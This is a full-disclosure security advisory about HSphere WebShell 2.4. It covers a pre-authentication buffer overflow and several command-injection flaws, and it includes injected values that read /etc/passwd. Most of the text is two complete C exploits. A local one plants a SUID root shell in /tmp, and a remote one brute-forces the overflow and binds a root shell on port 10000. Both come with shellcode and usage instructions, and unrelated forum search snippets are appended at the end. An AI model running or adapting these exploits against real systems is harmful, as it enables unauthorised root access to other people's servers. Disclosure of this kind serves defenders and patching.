[UNIX] Remote Root Vulnerability in HSphere WebShell
From: support@securiteam.com
Date: 01/08/03
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From: support@securiteam.com To: list@securiteam.com Date: 8 Jan 2003 11:05:03 +0200
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Remote Root Vulnerability in HSphere WebShell
------------------------------------------------------------------------
SUMMARY
WebShell is a web-based application that acts as a file manager for
uploading / downloading files via FTP. It uses username/password
authentication to ensure security. It runs SUID root in UNIX environments
so that it can read from the system shadow password file and change UID to
a successfully authenticated user.
There is a pre-authentication buffer overflow in the HTTP header
processing code which would allow a malicious user to overwrite data on
the stack; this can lead to execution of arbitrary code as root.
DETAILS
Vulnerable systems:
* WebShell version 2.4
The overflow occurs in the CGI::readFile() function of CGI.C when
insufficient bounds checking (i.e.: none at all) is performed on the
'boundary' string:
int CGI::readFile(istream& is, ostream& os, const char* boundary) {
char b1[255];
strcpy(b1, "\r");
strcat(b1, boundary);
The 'boundary' string is taken from the data-stream directly after the
HTTP headers in the incoming request. For example:
POST /cgi-bin/webshell HTTP/1.1
Host: www.vulnerablesite.com
Content-Type: multipart/form-data boundary=AAAAA (300 "A"s)
Content-Length: 900
--AAAAA (300 "A"s)
Content-Disposition: form-data; name="TESTNAME"; filename="TESTFILENAME"
This would overflow the 'b1' array with 300 "A"s and overwrite the saved
EIP with 0x41414141. Note that the data that overwrites 'b1' is not taken
from the 'Content-Type' header, but from the line preceding the
'Content-Disposition' field. Also note that both boundary tags need to be
identical for an exploit to succeed.
To ease exploitation, shellcode can be stored in an HTTP header that is
converted to an environment variable by the webserver (eg. Apache) when
webshell is executed. An example of such a header is 'Accept-Encoding';
this is converted to "HTTP_ACCEPT_ENCODING" and can store strings that
hold enormous amounts of shellcode. The provided exploit uses a small
port-binding shellcode written by Bighawk.
It should also be noted that webshell does not need to be exploited
remotely; it is perfectly possible to exploit it locally to elevate user
privileges to root.
Other vulnerabilities:
Lines 114-117 of 'command.C':
string file = dirname + '/' + cgi.varByName("file");
string mode = cgi.varByName("mode");
string tmp=CHMOD+mode+" "+shquote(encodeFileName(file));
if (0==system(tmp.c_str())) {
A user could execute commands by embedding them in the 'mode' field of the
HTTP query (e.g. 'mode=$(cat /etc/passwd) 0755').
---------
Lines 170-228 of 'command2.cc':
void Command::compress(bool download) {
string zipfile=encodeFileName(cgi.varByName("zipfile"));
string compression=cgi.varByName("compression");
.
.
if (compression.compare("zip")==0) {
.
.
cmd=ZIP" -q -r -b /tmp "+zipfile+tmp;
}
.
.
if (!error) {
if (download)
html.header("application/x-unknown");
error= !((chdir(dirname.c_str())==0) && (system(cmd.c_str())==0));
A user could execute commands by embedding them in the 'zipfile' field of
the HTTP query (eg. 'zipfile=xyzzy`ls -l`').
There are many occurrences of this type of error. It should also be noted
that the encodeFileName() function simply returns the string it was
passed! It does no encoding at all!
----------
Line 16 of diskusage.cc:
size+=diskusage(strcat(strcat(strcpy(file, path),
"/"),dir_entry->d_name));
'file' is declared as "char file[1024];" which could probably be used to
overflow stack variables, possibly modifying execution path via EIP.
----------
In flist() function in flist.C:
char fname[256];
int esize=strlen(ext);
int fsize;
if ((cdir=opendir(dname))!=NULL) {
while ((cfile=readdir(cdir)) != NULL) {
if ((esize>=(fsize=strlen(cfile->d_name))) ||
(strstr(cfile->d_name+fsize-esize,ext)==NULL)) continue;
strcpy(fname, dname);
strcat(fname, "/");
strcat(fname, cfile->d_name);
fname[] gets overwritten, EIP overwritten etc.
Solution:
The vendor response to these issues has been remarkable. In less than six
hours from notification, an updated version of webshell was available for
download from the Positive Software website; they have included an
automatic update tool in addition to the updated WebShell tarball.
Tarball: <http://www.hsphere.com/WebShell-2.4.tar.gz>
http://www.hsphere.com/WebShell-2.4.tar.gz
Update: <http://www.psoft.net/misc/webshell_patch.html>
http://www.psoft.net/misc/webshell_patch.html
Thanks to Ivor Seletskiy and the team for their excellent coordination in
responding to and resolving this matter.
Exploits:
In keeping with full-disclosure, here are two exploits: a local one which
will elevate any user to r00t, and a remote one which works against all
tested webshell installations and yields a remote root shell on port 10000
(by default).
Both exploits work in a bruteforce manner, which ensures that they work
more often than not. However, this bruteforcing means that the exploits
are 'noisy': they leave a lot of mess. Cleaning up after this mess is left
as an exercise for the reader.
First, the local exploit:
/*
* Local r00t exploit for Webshell 2.4 (possibly other versions).
* Vulnerability found and exploit written by Carl Livitt
* (carl (@) learningshophull.co.uk).
*
Exploits a simple stack-based buffer overflow in CGI.C of the
HSphere webshell component which is installed SUID & GUID root
by default.
Uses a bruteforce method to guess the return address on the stack
and the amount of data to overflow the buffer with; this ensures
it works under many different environments. I originally hardcoded
these values, but found that this was unreliable.
Copy this file (webshell-local.c) to /tmp and then:
cd /tmp
gcc -o webshell-local webshell-local.c
cd /path/to/the/webshell/directory
/tmp/webshell-local
That should get you r00t without any messing about.
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#define EGG_SIZE_START 257
#define EGG_SIZE_END 291
#define RET_ADDR_START 0xbfffe910
#define RET_ADDR_END 0xbfffffff
#define RET_ADDR_INCREMENT 256
#define CONTENT_LENGTH 42
#define SHELLSCRIPT_FILE "/tmp/zz"
#define EXPLOIT_FILE "/tmp/.webshell.txt"
#define ROOT_SHELL "/tmp/rs"
#define WEBSHELL_PROGRAM "./webshell"
void create_shellscript_file();
void make_shellcode();
void make_exploit_buffer();
void setup_environment();
void make_exploit_file();
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" // setuid(0)
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/zz"; // aleph1 execve() of /bin/sh
char sc[1024];
char egg[1024];
char shell_script[]=
"#!/bin/sh\n"
"cd /tmp\n"
"cat << ROOTSHELL > "ROOT_SHELL".c\n"
"main() { setuid(0);setgid(0);system(\"/bin/bash\");}\n"
"ROOTSHELL\n"
"gcc -o "ROOT_SHELL" "ROOT_SHELL".c\n"
"chown root:root "ROOT_SHELL"*\n"
"chmod 6777 "ROOT_SHELL"\n"
"chmod 0666 "ROOT_SHELL".c\n";
char greeting[]="Webshell 2.4 bruteforce exploit for Linux x86 - by Carl
Livitt\n";
int EGG_SIZE=EGG_SIZE_START;
unsigned long RET_ADDR=(unsigned long)RET_ADDR_START;
char *env[4];
/*
* The fun begins here...
*/
main(int argc, char **argv) {
int brute_force_mode=1, status, pid;
struct stat s;
/*
* Check to see if the exploit has been run before...
*/
if(stat((char *)ROOT_SHELL,&s)==0) {
printf("Root shell already exists... executing...\n");
system(ROOT_SHELL);
exit(0);
}
/*
* Make sure that the webshell binary can be found
* and is SUID root
*/
if(stat(WEBSHELL_PROGRAM, &s)!=0) {
printf(WEBSHELL_PROGRAM" not found!\n");
exit(1);
} else if(!(s.st_mode&S_ISUID)) {
printf(WEBSHELL_PROGRAM" is not SUID root!\n");
exit(1);
}
/*
* Start the bruteforce loop...
*/
printf("%s\nBruteforcing EGG_SIZE and RET_ADDR..", greeting);
do {
// setup exploit buffers
make_shellcode();
make_exploit_buffer();
setup_environment();
make_exploit_file();
create_shellscript_file();
printf(".");fflush(stdout);
// fork and execute the webshell binary, passing it the
// exploit input.
if((pid=fork())==0) {
system(WEBSHELL_PROGRAM" < "EXPLOIT_FILE"
&>/dev/null");
exit(0);
} else {
waitpid(pid, &status, 0);
}
// If ROOT_SHELL exists, then the exploit was successful.
// So execute it!
if(stat((char *)ROOT_SHELL,&s)==0) {
printf("\nEntering r00t shell...\n\n");
system(ROOT_SHELL);
exit(0);
}
// The ROOT_SHELL did not exist, so adjust the bruteforce
// parameters and continue...
EGG_SIZE++;
if(EGG_SIZE>EGG_SIZE_END) {
RET_ADDR+=RET_ADDR_INCREMENT;
if(RET_ADDR>RET_ADDR_END) {
printf("Leaving bruteforce mode...\n");
brute_force_mode=0;
} else {
EGG_SIZE=EGG_SIZE_START;
}
}
} while(brute_force_mode);
printf("Bruteforce exhausted - EXPLOIT FAILED.\n");
}
/*
* Creates the file to be used as stdin for webshell.
*/
void make_exploit_file() {
FILE *fp;
if((fp=fopen(EXPLOIT_FILE,"w"))==NULL) {
printf("Could not create exploit file %s\n", EXPLOIT_FILE);
exit(1);
}
fprintf(fp, "--%s\n", egg+CONTENT_LENGTH);
fprintf(fp, "Content-Disposition: form-data; name=\"TESTNAME\";
filename=\"TESTFILENAME\"\r\n\r\n");
fclose(fp);
}
/*
* Create the malicious environment in which webshell will run
*/
void setup_environment() {
int i;
unsetenv("S");
unsetenv("CONTENT_LENGTH");
unsetenv("REQUEST_METHOD");
unsetenv("CONTENT_TYPE");
env[0]=strdup(egg);
env[1]=strdup(sc);
env[2]=strdup("CONTENT_LENGTH=261");
env[3]=strdup("REQUEST_METHOD=POST");
env[4]=NULL;
for(i=0;i<4;i++)
putenv(env[i]);
}
/*
* It is the 'boundary' section of a multipart/form-data MIME type
* that overflows the buffer in webshell. This function creates the
* malicious boundary.
*/
void make_exploit_buffer() {
int i;
memset(egg, 0, EGG_SIZE-1);
memcpy(egg, "CONTENT_TYPE=multipart/form-data boundary=",
CONTENT_LENGTH);
for(i=0;i<EGG_SIZE; i+=4) {
egg[i+CONTENT_LENGTH]=RET_ADDR&0xff;
egg[i+CONTENT_LENGTH+1]=(RET_ADDR>>8)&0xff;
egg[i+CONTENT_LENGTH+2]=(RET_ADDR>>16)&0xff;
egg[i+CONTENT_LENGTH+3]=(RET_ADDR>>24)&0xff;
}
egg[EGG_SIZE+CONTENT_LENGTH-1]='\0';
}
/*
* Makes a 1024-byte buffer filled with NOPs and shellcode
*/
void make_shellcode() {
memset(sc, 0x90,1024);
sc[0]='S';
sc[1]='=';
memcpy(sc + 1024 - (strlen(shellcode)+1), shellcode,
strlen(shellcode));
sc[1023]='\0';
}
/*
* Generate the shellscript that will be executed by the shellcode.
* By default, it will create a SUID root shell in /tmp
*/
void create_shellscript_file() {
FILE *fp;
if((fp=fopen(SHELLSCRIPT_FILE,"w"))==NULL) {
printf("Could not create %s\n", SHELLSCRIPT_FILE);
exit(1);
}
fprintf(fp, "%s", shell_script);
fclose(fp);
chmod(SHELLSCRIPT_FILE, S_IXOTH | S_IROTH | S_IWOTH | S_IXUSR |
S_IRUSR | S_IWUSR);
}
The remote exploit:
/*
* Remote r00t exploit for Webshell 2.4 (possibly other versions).
* Vulnerability found and exploit written by Carl Livitt
* (carl (@) learningshophull.co.uk).
*
Exploits a simple stack-based buffer overflow in CGI.C of the
HSphere webshell component which is installed SUID & GUID root
by default.
This exploit will bind a r00t shell to port 10000 (by default) of
the remote box. Feel free to use any shellcode of your choice.
This code is a butchered version of the local exploit for
webshell. It works on my test box, and won't be refined any further,
although the bruteforcer should work on most webshell installations.
To exploit:
gcc -o webshell-remote webshell-remote.c
/webshell-remote -t www.host-to-exploit.com -l /path/to/webshell
That's it. It'll work on almost all vulnerable hosts (running Linux).
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>
#include <time.h>
/*
* Play with these to make it work (if it fails!)
*/
#define EGG_SIZE_START 280
#define EGG_SIZE_END 291
#define RET_ADDR_START 0xbffff010
#define RET_ADDR_END 0xbfffffff
#define RET_ADDR_INCR 768
#define COMMAND1 "id\n"
#define COMMAND2 "uname -a\n"
#define ROOT_SHELL_PORT 10000
// should only be needed against localhost. Set to 0 to disable.
#define SLEEP_TIME 125000000L
// don't play with this, you'll only break things.
#define CONTENT_LENGTH 43
void make_shellcode();
void make_exploit_buffer();
void make_boundary_buffer();
/*
* 88 bytes portbinding shellcode - linux-x86
* - by bighawk (bighawk@warfare.com)
* setuid(0) and setgid(0) added by Carl Livitt
*/
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80" // setuid(0),setgid(0)
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80"
"\x89\xc7\x52\x66\x68"
"XX" // XX is port number
"\x43\x66\x53\x89\xe1\xb0\x10\x50\x51"
"\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57"
"\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80"
"\x41\xe2\xf8\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
"\x51\x53\x89\xe1\xb0\x0b\xcd\x80"; // bind shell on port 10000
/*
* Ahhhh, global variables make life easy :)
*/
char sc[1024];
char egg[1024];
char exploit_buf[4096];
char target[256];
int port=80;
char location[1024];
unsigned long RET_ADDR;
int EGG_SIZE, root_shell_port=ROOT_SHELL_PORT;
char usage[]=
"-h This cruft\n"
"-t host Target host (eg. www.xyzzy.com)\n"
"-p port Target port [80]\n"
"-P port Port to bind shell on remote host [10000]\n"
"-l location Location of webshell (eg. /cgi-bin/webshell)\n\n"
"Example:\n\n"
"./exp-remote -t www.xyzzy.com -p 8080 -P 12345 -l
/psoft/servlet/psoft.hsphere.CP\n\n"
"This would attack
http://www.xyzzy.com:8080/psoft/servlet/psoft.hsphere.CP\n"
"and bind a root shell to port 12345 if successful.\n\n";
/*
* The fun begins here...
*/
main(int argc, char **argv) {
int ch, websock, shellsock,r=1;
struct hostent *host;
struct sockaddr_in saddr;
char buf[8092];
struct timespec sleepTime;
fd_set rfds;
int retval;
/*
* Process command-line args
*/
while((ch=getopt(argc,argv,"ht:p:P:l:"))!=-1) {
switch(ch) {
case 'h':
printf("%s",usage);
exit(0);
break;
case 't':
strncpy(target, optarg, sizeof(target)-1);
break;
case 'p':
port=atoi(optarg);
break;
case 'P':
root_shell_port=atoi(optarg);
break;
case 'l':
strncpy(location, optarg, sizeof(location)-1);
break;
default:
printf("%s", usage);
exit(0);
break;
}
}
/*
* Tell the attacker we're about to start the exploit.
* Look up the IP address of the host specified on the
* command-line
*/
if((host=gethostbyname(target))==NULL) {
printf("Host not found. Usage:\n%s\n", usage);
exit(1);
}
printf("Exploiting http://%s:%d%s%s..", target, port,
(location[0]=='/')?"":"/", location);
/*
* Start the bruteforce loop
*/
for(RET_ADDR=RET_ADDR_START; RET_ADDR<RET_ADDR_END;
RET_ADDR+=RET_ADDR_INCR)
{
for(EGG_SIZE=EGG_SIZE_START; EGG_SIZE<EGG_SIZE_END; EGG_SIZE++) {
/*
* Setup the exploit strings and
* HTTP headers. The Accept-Encoding header
* will hold shellcode: it will be passed
* to the environment of webshell giving us
* a reasonably predictable RET address.
*/
make_shellcode();
make_boundary_buffer();
make_exploit_buffer();
/*
* Now connect to the host and send the exploit
* string...
*/
if((websock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) {
perror("socket()");
exit(1);
}
memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
saddr.sin_family=AF_INET;
saddr.sin_addr.s_addr=*((unsigned long *)host->h_addr_list[0]);
saddr.sin_port=htons(port);
printf(".");fflush(stdout);
if(connect(websock, (struct sockaddr *)&saddr, sizeof(saddr))<0) {
perror("connect()");
exit(1);
}
send(websock, exploit_buf, strlen(exploit_buf), 0);
close(websock);
/*
* This pause is needed when exploiting localhost.
* It can be ignored against remote hosts (I think!)
*/
sleepTime.tv_sec=0;
sleepTime.tv_nsec=SLEEP_TIME;
nanosleep(&sleepTime, &sleepTime);
/*
* If the exploit attempt succeded, there should now
* be a r00t shell bound to port xxxxx of the target
* box. Lets try and connect to it...
*/
if((shellsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) {
perror("socket()");
exit(1);
}
memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
saddr.sin_family=AF_INET;
saddr.sin_addr.s_addr=*((unsigned long *)host->h_addr_list[0]);
saddr.sin_port=htons(root_shell_port);
if(connect(shellsock, (struct sockaddr *)&saddr, sizeof(saddr))==0)
goto CONNECTED; // goto? Damn amateurs...
/*
* If we get here, the exploit failed. Try the next
* iteration of the brute force loop.
*/
close(shellsock);
}
}
/*
* If we get here, then the bruteforce was exhausted without a
* succesful exploit.
*/
printf("\nFailed to exploit the webshell binary. :(\n");
exit(0);
CONNECTED:
/*
* We're now connected to the remote host. Issue
* some commands... ('id' and 'uname -a' by default)
*/
printf("\n\nExploit successful!\nIssuing some commands...\n\n");
if(send(shellsock, COMMAND1, strlen(COMMAND1), 0)==-1) {
perror("send()");
exit(1);
}
buf[recv(shellsock, buf, sizeof(buf)-1, 0)]='\0';
printf("%s", buf);
send(shellsock, COMMAND2, strlen(COMMAND2), 0);
buf[recv(shellsock, buf, sizeof(buf)-1, 0)]='\0';
printf("%s\n", buf);
printf("You are now at a bash prompt...\n");
/*
* Now let the attacker issue commands to the remote
* shell, just as if (s)he had launched 'nc host 10000'.
* Note the dodgy coding of assigning NULLs to the buf[]
* array. What would happen if recv() or read() returned -1 ?
* You guessed it: we mung some variables on the stack!
*/
do {
FD_ZERO(&rfds);
FD_SET(0, &rfds);
FD_SET(shellsock, &rfds);
retval=select(shellsock+1, &rfds, NULL, NULL, NULL);
if(retval) {
if(FD_ISSET(shellsock, &rfds)) {
buf[(r=recv(shellsock, buf, sizeof(buf)-1,0))]='\0';
printf("%s", buf);
}
if(FD_ISSET(0, &rfds)) {
buf[(r=read(0, buf, sizeof(buf)-1))]='\0';
send(shellsock, buf, strlen(buf), 0);
}
}
} while(retval && r); // loop until connection terminates
close(shellsock);
exit(0);
}
/*
* Create the HTTP request that will setup the exploit
* conditions in webshell. Shellcode is stored in the
* Accept-Encoding HTTP header.
*/
void make_exploit_buffer() {
sprintf(exploit_buf,"POST %s HTTP/1.1\n",location);
sprintf(exploit_buf,"%sHost: %s\n",exploit_buf,target);
sprintf(exploit_buf,"%sAccept-Encoding: %s\n",exploit_buf, sc);
sprintf(exploit_buf,"%s%s\n",exploit_buf,egg);
sprintf(exploit_buf,"%sContent-Length: %d\n\n",exploit_buf,EGG_SIZE*2);
sprintf(exploit_buf,"%s--%s\n",exploit_buf, egg+CONTENT_LENGTH);
sprintf(exploit_buf,"%sContent-Disposition: form-data; name=\"TESTNAME\";
filename=\"TESTFILENAME\"\r\n\r\n",exploit_buf);
sprintf(exploit_buf,"%s%-*s\n",exploit_buf, EGG_SIZE*4," ");
}
/*
* Create the buffer that holds the 'boundary' data. This
* is what actually overflows the buffer on the stack.
*/
void make_boundary_buffer() {
int i;
memset(egg, 0, EGG_SIZE-1);
memcpy(egg, "Content-Type: multipart/form-data boundary=",
CONTENT_LENGTH);
for(i=0;i<EGG_SIZE; i+=4) {
egg[i+CONTENT_LENGTH]=RET_ADDR&0xff;
egg[i+CONTENT_LENGTH+1]=(RET_ADDR>>8)&0xff;
egg[i+CONTENT_LENGTH+2]=(RET_ADDR>>16)&0xff;
egg[i+CONTENT_LENGTH+3]=(RET_ADDR>>24)&0xff;
}
egg[EGG_SIZE+CONTENT_LENGTH-1]='\0';
}
/*
* Creates a 1024-byte buffer holding NOPs and shellcode.
*/
void make_shellcode() {
// Fill in the port number
shellcode[33]=htons(root_shell_port)&0xff;
shellcode[34]=(htons(root_shell_port)>>8)&0xff;
// Finish making shellcode buffer
memset(sc, 0x90,1024);
memcpy(sc + 1024 - (strlen(shellcode)+1), shellcode, strlen(shellcode));
sc[1023]='\0';
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:carl@learningshophull.co.uk>
Carl Livitt.
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... probably a content-type/file association/command string handling problem. ...
padding and added IO checking of a very secure app. ... secure programming language
or framework. ... hyperventalating over the security of your own code will ever make it
... (Full-Disclosure) - Re: WSE 3.0, usernameOverTransportSecurity, custom Token Manager w/ securityTokenManager,
... I've added the web service call directly to my Data binding method ... expected
but not present in the security header of the incoming ... the username token to
the message. ... protected override string AuthenticateToken(UsernameToken token) ...
(microsoft.public.dotnet.framework.webservices.enhancements) - Re: WSE2005: Protection requirements in MutualCertificate11Asserti
... error when there is a algorithm mismatch between the client and the ... The
Web service is using different security requeriments. ... my client, the response
page is a browser page ... message, String messageContentType) ... (microsoft.public.dotnet.framework.webservices.enhancements) - Re: Secure C library
... I read much of the new "security TR", and gee, I don't know. ... the buffer
from the buffer size. ... It is not hard to design a better form of buffer and string handling.
... but this is just one example of how thoughtful interface design can ... (comp.std.c) - Re: WSE2005: Protection requirements in MutualCertificate11Asserti
... The solution will be to make my client match the service since ... The Web service
is using different security requeriments. ... my client, the response page is a
browser page ... message, String messageContentType) ... (microsoft.public.dotnet.framework.webservices.enhancements)
